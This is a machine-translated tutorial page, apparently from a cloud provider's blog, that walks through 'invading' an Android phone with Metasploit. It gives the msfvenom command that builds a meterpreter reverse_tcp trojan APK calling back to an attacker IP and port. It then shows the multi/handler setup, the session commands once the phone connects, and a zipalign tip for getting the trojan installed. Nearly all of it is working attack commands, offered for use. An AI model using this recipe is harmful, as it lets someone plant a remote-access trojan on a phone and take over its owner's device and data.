Metasploit is an open source security vulnerability detection tool that helps security and IT professionals identify security issues, validate vulnerability mitigation measures, and manage expert-driven security assessments to provide true security risk intelligence. These features include intelligent development, code auditing, Web application scanning, and social engineering. Team work together in Metasploit and consolidated reports to present their findings.
Environment Preparation:Kali2.0 (Msfvenom, Metasploit)
Android Phone or Android simulator
Check the local IP address first
Using Msfvenom to generate APK trojan
| 1 | msfvenom -p android/ meterpreter/reverse_tcp lhost=172.16.105.184 lport=5555 r > /root/apk. APK |
Comments:
Lhost = Receive Bounce Connection host
Lport = Listen port to receive bounce connection host
172.16.105.184 modified to local IP address 5555 is the generated port number/root/apk.apk is the generated apk path
The build succeeds as shown in the instructions!
Start Msfconsole
Enter the command:
| 1 | Msfconsole |
Then execute the following command
| 123 | use exploit/multi/handler //Load module set payload android/meterpreter/reverse_tcp //Select payload show options //view parameter settings |
This payload has two parameters to set
Lhost and Lport indicate that the address and port default port is 4444 Now let's change the settings
| 123 | set lhost 172.16.105.184 //The address here sets the IP address of the Trojan we just generated set lport 5555 //The port here is configured to the port we are listening on when we generated the Trojan . |
After the configuration is complete, we can execute
| 1 | Show options //See if the configuration is successful |
Finally, we install the generated APK file into the simulator or the phone and then execute
| 1 | Exploit //Start execution vulnerability start listening, waiting for mobile phone to go online |
We can find that there is an ID connected to the native, and now we can execute
| 12 | sessions //view connection status Sessions 1 //Establish a host connection to ID value bit 1 |
Now we can execute
| 1 | SysInfo |
More command parameters can be viewed using the help command
PS: If you do not understand in the operation process or encountered any problems can be in the article below the message small residue see regret the first time for everyone to answer
If you encounter some phones will not be able to install the post-build apk file Then we can zipalign tool optimization processing
| 1 | Zipalign -v 4 apk. APK napk1. APK |
Kali Environment uses Metasploit Trojan to invade Android phone
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
